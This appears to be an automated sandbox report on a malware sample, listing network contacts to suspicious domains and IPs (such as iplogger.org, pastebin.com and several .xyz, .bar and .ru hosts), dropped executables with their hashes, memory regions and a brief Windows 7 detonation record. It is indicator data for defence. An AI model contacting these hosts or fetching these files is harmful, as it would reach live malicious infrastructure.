Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 gazrxlog.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 whealclothing.xyz udp
US 8.8.8.8:53 my-all-group.bar udp
US 8.8.8.8:53 m525-blockchain31432.bar udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
N/A 127.0.0.1:65269 tcp
N/A 127.0.0.1:65271 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c93901703b1d556d494f7a31ffb04720
SHA1 d14e2dc239ac85e6020f1fc4c035f7d2ea72d262
SHA256 0d5b2226f4199a3891ec836c5b54023595b4aa06d4a80e816a8d6545a0bb3631
SHA512 3e31e881d7b7c74baa5ea0e8d97f86dfc6feb06ec7061f30891b7736477f2888fdb58ccaa4d8ea764249191c89e5897954515b6bfdfe6a45d51640c63c20e900

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe

MD5 a979670adefae9ab376382f3229f3f28
SHA1 5b5b75a789e46a2f8ac02fba3d895fa968387c9b
SHA256 a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040
SHA512 f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3952-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3952-65-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3952-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3952-75-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3952-74-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3952-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3952-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1084-76-0x0000000002670000-0x00000000026A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe

MD5 e9133ca1a95483a3331d0f336685302d
SHA1 48c1348e20b26be8227ed63a1db0f13716f1b8e3
SHA256 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b
SHA512 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe

MD5 854ea0bc0602795b95da3be8257c530f
SHA1 f243a71edc902ed91d0f990630a73d0d01828c73
SHA256 c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e
SHA512 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe

MD5 0e05650d436fd4d92775cd4f65973870
SHA1 4d13aaa6b18630d0c89400cee5933130f03bd762
SHA256 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16
SHA512 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe

MD5 dd2fdd69b9db1cf5764dcfd429a1cf5e
SHA1 c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8
SHA256 d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe
SHA512 c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat060fd7e42d2.exe

MD5 29c9683aa48f1e3a29168f6b0ff3be04
SHA1 f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f
SHA256 e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901
SHA512 a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe

MD5 10e13cc7b41d162ab578256f27d297b1
SHA1 1d938b7e6e99951d9b8139f078483539120021e6
SHA256 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9
SHA512 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe

MD5 1cc8a64b178076dca421fedc3a248a56
SHA1 db8ed444965577dfb6db4f92ddd8d96a157ddea5
SHA256 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345
SHA512 c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff

memory/1084-77-0x0000000004EF0000-0x0000000005518000-memory.dmp

memory/3952-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3952-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3952-68-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3952-67-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3952-64-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3952-63-0x0000000000C70000-0x0000000000CFF000-memory.dmp

memory/3952-62-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3952-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/1084-101-0x0000000005790000-0x00000000057F6000-memory.dmp

memory/1084-99-0x0000000005620000-0x0000000005642000-memory.dmp

memory/3824-104-0x0000000000560000-0x00000000005C8000-memory.dmp

memory/1084-100-0x0000000005720000-0x0000000005786000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h4yl2515.joc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1084-111-0x0000000005800000-0x0000000005B54000-memory.dmp

memory/672-110-0x0000000000290000-0x00000000002AA000-memory.dmp

memory/3824-112-0x0000000004E00000-0x0000000004E76000-memory.dmp

memory/672-115-0x0000000000A50000-0x0000000000A56000-memory.dmp

memory/3824-114-0x0000000004DA0000-0x0000000004DBE000-memory.dmp

memory/3824-125-0x0000000005620000-0x0000000005BC4000-memory.dmp

memory/1084-126-0x0000000005C60000-0x0000000005C7E000-memory.dmp

memory/116-127-0x00000000066C0000-0x000000000670C000-memory.dmp

memory/1428-129-0x0000000000400000-0x0000000000883000-memory.dmp

memory/672-130-0x000000001B1D0000-0x000000001B2D2000-memory.dmp

memory/3952-140-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3952-139-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3952-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3952-137-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3952-135-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3952-131-0x0000000000400000-0x000000000051B000-memory.dmp

memory/116-151-0x0000000007140000-0x0000000007172000-memory.dmp

memory/116-152-0x000000006D1B0000-0x000000006D1FC000-memory.dmp

memory/116-163-0x0000000007420000-0x00000000074C3000-memory.dmp

memory/116-162-0x0000000006760000-0x000000000677E000-memory.dmp

memory/1084-164-0x000000006D1B0000-0x000000006D1FC000-memory.dmp

memory/1064-178-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1064-182-0x0000000005240000-0x000000000534A000-memory.dmp

memory/116-181-0x0000000007B50000-0x00000000081CA000-memory.dmp

memory/1064-184-0x0000000005170000-0x00000000051AC000-memory.dmp

memory/116-183-0x00000000071F0000-0x000000000720A000-memory.dmp

memory/1064-180-0x0000000005110000-0x0000000005122000-memory.dmp

memory/1064-179-0x0000000005630000-0x0000000005C48000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat062000ca9aa6.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/1084-185-0x0000000007000000-0x000000000700A000-memory.dmp

memory/116-186-0x0000000007720000-0x00000000077B6000-memory.dmp

memory/116-187-0x00000000076B0000-0x00000000076C1000-memory.dmp

memory/116-208-0x00000000076E0000-0x00000000076EE000-memory.dmp

memory/116-209-0x00000000076F0000-0x0000000007704000-memory.dmp

memory/116-210-0x00000000077E0000-0x00000000077FA000-memory.dmp

memory/1084-211-0x00000000072A0000-0x00000000072A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ScMeAP.SU

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Temp\20L2vNO.2

MD5 4bf3493517977a637789c23464a58e06
SHA1 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4
SHA256 ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831
SHA512 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7727e238bcfe2e321072500c68ed0d20
SHA1 dfb774b29dd1621bb8b24fbcc699bae37002e899
SHA256 74d126fa51a276db01dfaf47941be9aea660552c61cd1dfbf43a6159102b72dd
SHA512 2b09f87dcd1291bc347b07fb325eed7a7d79e79d6c1cf106ef12a5d415ceef84385b3233998de167a6eb0e07e3927da1a31bfc8d0f1eba84d5bdf329b1ab8484

C:\Users\Admin\AppData\Local\Temp\ykifDQA.1

MD5 7b25b2318e896fa8f9a99f635c146c9b
SHA1 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2
SHA256 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89
SHA512 a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6

C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0

MD5 6c83f0423cd52d999b9ad47b78ba0c6a
SHA1 1f32cbf5fdaca123d32012cbc8cb4165e1474a04
SHA256 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae
SHA512 e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec

C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh

MD5 973c9cf42285ae79a7a0766a1e70def4
SHA1 4ab15952cbc69555102f42e290ae87d1d778c418
SHA256 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968
SHA512 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85

C:\Users\Admin\AppData\Local\Temp\6h87pfZ.4

MD5 243a3d5a63c4d0f3a18a3d340f50ed8d
SHA1 4b5d7d91fdc7666d131ef4ed7524bdc1b024a009
SHA256 4da1a700d1dd30fa025a3682aa490680099d508a0b64fbdf8bac2f92914628a1
SHA512 64cd601f218c7ace06dd62ad41faf58d829b77f221fa444d2e347f52fa03210584f75448416e4910a0bb2058aafb8aaadcc9e9ea5c353cb29c352c23c6532ab1

C:\Users\Admin\AppData\Local\Temp\FdKD47Ef.i1

MD5 22e51c0e8d96e09cf8571ef2a4f91cfb
SHA1 46f3a3ad48c540816c110c67b8eab824ebeec8c1
SHA256 e296a4b63a6561115cab7809fb27eb85d3db864d59ecbce82b784d52572a83f1
SHA512 40e328acf47cbf6754b29b856e6a17e6cc15cf9b11b9e58b267fb26b14d598e71cefa266b43f552d51d81dca712e5024a77ca09fb1535ae54cb8586e8b5ccc7f

C:\Users\Admin\AppData\Local\Temp\BtDIj1.fYl

MD5 d17564f93bb4a4cf11c46726ea1fe74b
SHA1 84cbff97ff148296bf36898dcf640ad18eb317c9
SHA256 96a4ccf3bc2092c2198cad0beb6a6fdc26db7f59bb82bf4e476bbac6fc783ce0
SHA512 f327cac0e017ebdaa87e1a8ed40d3abfa5a7614250a9759d6ae62f0f7149aa8ee4a26bb74854ef3860ae8911d87b55803d1f4c0fd58d19507ac4b91eebbb48ff

C:\Users\Admin\AppData\Local\Temp\Q_tW.pL

MD5 40ba2d6fcce0565f8d90055a8fb9975b
SHA1 c7529fea938658e19d238200af795533cba13c5c
SHA256 df403d434bdcc3b3604349310c62ca68718f1388a3d9c6155e026ff685b555b6
SHA512 fd8dd7936d96952acaba5f96ff6116b17bc79f770b324945ba966b00e6b3ff6c9f6388bd402d3e5ad40d42a37123416fe904a7d15c749585593caecfcf46b816

C:\Users\Admin\AppData\Local\Temp\jB946RB.I7A

MD5 d4c89c7cabd256ccedd701e27b3fc31a
SHA1 c01e95b983215b9a08c807084185dbd17ccd32aa
SHA256 e7fe376512c6ba9b615d492961ef38a27b14d192b7c9751b75d9004370b5266c
SHA512 1d3d59c17368f3e264241fc5100971b74487d0bdc0e7902081a332314fdc59e07475f1aaeed17cd2bc1f64c59378ebe1b76e83ea046351d6691c647a60cbb421

C:\Users\Admin\AppData\Local\Temp\U56d.r

MD5 4d5164bd007e1af1a6b436b89fc98329
SHA1 808e5215729cff6daf37bfcac7af29e8959a7c26
SHA256 eaeb79cf3f2e99906d1b5f89b92fcb5555117f0a527247b5becbc78cf65cc434
SHA512 f977ced0b42db76bab7d79d35f6dad56bdbbde527ccde0f8810838d5364b89223f9ec673915ac9b0f595bad7251d3d17d1be479c8ed5bf56c19aac8470a6b668

memory/1432-238-0x0000000002280000-0x0000000002482000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XHnbBPN.0kM

MD5 ab06b4a2368530bea1f4a24f7a4042a0
SHA1 4d2f5c0c585eca9589b726d17528d2eb7e8da3bf
SHA256 e53029f24e2d1bf07cac3ba80aad1a0cbff995e2cdc1c32cb74a43a5e8f3fe6e
SHA512 3ad8acdbca7839f7f1c6ce404a767dd8d3cd0d43a8b98100387c5f8e6cf7f5ab6a08fb6a7456a5beea73ab693cbf4e0def91e601d57b1be9dc865de34f65007f

C:\Users\Admin\AppData\Local\Temp\r6f7sE.I

MD5 bd3523387b577979a0d86ff911f97f8b
SHA1 1f90298142a27ec55118317ee63609664bcecb45
SHA256 a7e608f98f06260044d545f7279b8f859f7b7af98ac2b2b79a3cd7ac3b2dac36
SHA512 b37cb8daddb526312f6be439a3cb87fe62b69d44866df708f10eb148455f09f90b0dcee4360c1ae332d3936357fd4c474920aebec5aa8ddb005b617356c3d286

memory/1028-242-0x0000000000400000-0x000000000089B000-memory.dmp

memory/1432-246-0x0000000002B20000-0x0000000002BC5000-memory.dmp

memory/1432-250-0x0000000002BD0000-0x0000000002C62000-memory.dmp

memory/1432-247-0x0000000002BD0000-0x0000000002C62000-memory.dmp

memory/4536-252-0x0000000000400000-0x000000000054C000-memory.dmp

memory/1432-251-0x0000000002280000-0x0000000002482000-memory.dmp

memory/4536-253-0x0000000003090000-0x0000000003135000-memory.dmp

memory/4536-257-0x0000000003140000-0x00000000031D2000-memory.dmp

memory/4536-255-0x0000000003140000-0x00000000031D2000-memory.dmp

memory/1908-258-0x0000000000400000-0x000000000054C000-memory.dmp

memory/1908-264-0x0000000003630000-0x00000000036D5000-memory.dmp

memory/1908-269-0x00000000036E0000-0x0000000003772000-memory.dmp

memory/1908-266-0x00000000036E0000-0x0000000003772000-memory.dmp

memory/1432-275-0x0000000002BD0000-0x0000000002C62000-memory.dmp

memory/4536-282-0x0000000003140000-0x00000000031D2000-memory.dmp

memory/2272-287-0x0000000000400000-0x000000000054C000-memory.dmp

memory/1908-288-0x00000000036E0000-0x0000000003772000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20241010-en

Max time kernel

151s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe"

C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe

"C:\Users\Admin\AppData\Local\Temp\25d79c1a508700c16bfa42039870d590bb3281c271ed02db20899c87259c657f.exe" -u

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.gogamec.com udp

Files

N/A